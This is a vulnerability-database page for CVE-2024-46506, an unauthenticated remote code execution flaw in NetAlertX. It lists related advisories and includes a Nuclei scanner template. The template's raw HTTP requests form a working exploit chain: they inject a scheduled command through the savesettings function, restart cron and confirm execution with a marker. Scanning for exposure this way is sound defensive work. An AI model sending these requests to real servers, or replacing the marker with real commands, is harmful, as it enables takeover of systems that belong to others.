| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
| Exploit for Missing Authentication for Critical Function in Netalertx | 27 Dec 202522:07 | – | githubexploit | |
| The vulnerability of the saveSettings() function in the settings.php script of the NetAlert X intrusion notification network infrastructure allows a intruder to execute arbitrary code. | 11 Mar 202500:00 | – | bdu_fstec | |
| CVE-2024-46506 | 30 Jan 202512:03 | – | circl | |
| NetAlertX 安全漏洞 | 13 May 202500:00 | – | cnnvd | |
| NetAlertX 安全漏洞 | 13 May 202500:00 | – | cnnvd | |
| CVE-2024-46506 | 13 May 202500:00 | – | cve | |
| CVE-2024-46506 | 13 May 202500:00 | – | cvelist | |
| NetAlertX File Read Vulnerability | 25 Feb 202518:53 | – | metasploit | |
| Unauthenticated RCE in NetAlertX | 11 Feb 202518:55 | – | metasploit | |
| CVE-2024-46506 | 13 May 202516:15 | – | nvd |
id: CVE-2024-46506
info:
name: NetAlertX 23.01.14–24.x < 24.10.12 - Remote Code Execution
author: s4e-io
severity: critical
description: |
NetAlertX 23.01.14 through 24.x before 24.10.12 allows unauthenticated command injection via settings update because function=savesettings lacks an authentication requirement, as exploited in the wild in May 2025. This is related to settings.php and util.php.
impact: |
Unauthenticated attackers can execute arbitrary commands on the NetAlertX server without authentication.
remediation: |
Update NetAlertX to version 24.10.12 or later.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2024-46506
cwe-id: CWE-306
epss-score: 0.62307
epss-percentile: 0.99079
cpe: cpe:2.3:a:netalertx:netalertx:*:*:*:*:*:*:*:*
metadata:
verified: true
fofa-query: title="netalertx"
vendor: netalertx
product: netalertx
tags: cve,cve2024,netalertx,rce,intrusive,vkev,vuln
variables:
marker: "{{to_lower(rand_base(6))}}"
uuid: "{{to_lower(rand_base(8))}}-{{to_lower(rand_base(4))}}-{{to_lower(rand_base(4))}}-{{to_lower(rand_base(4))}}-{{to_lower(rand_base(12))}}"
flow: http(1) && http(2) && http(3)
http:
- raw:
- |
POST /php/server/util.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
function=savesettings&settings=[["DBCLNP","DBCLNP_RUN","string","schedule"],["DBCLNP","DBCLNP_CMD","string","{{marker}}"],["DBCLNP","DBCLNP_RUN_SCHD","string","* * * * *"]]
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body,"OK")'
condition: and
internal: true
- raw:
- |
POST /php/server/util.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
function=addToExecutionQueue&action={{uuid}}|cron_restart_backend
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body,"{{uuid}}","added to the execution queue")'
condition: and
internal: true
- raw:
- |
GET /api/table_settings.json HTTP/1.1
Host: {{Hostname}}
{{wait_for(5)}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "{{marker}}")'
- 'contains(content_type,"application/json")'
condition: and
# digest: 4b0a00483046022100b28d2eac984814e7b0fc9ede2faec4f373dbb4d1184fa83d1972388e01241c1c022100b633238b5716a0a8e682b161c927306a2c89a938cff8081cd54c3ac76dcde842:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation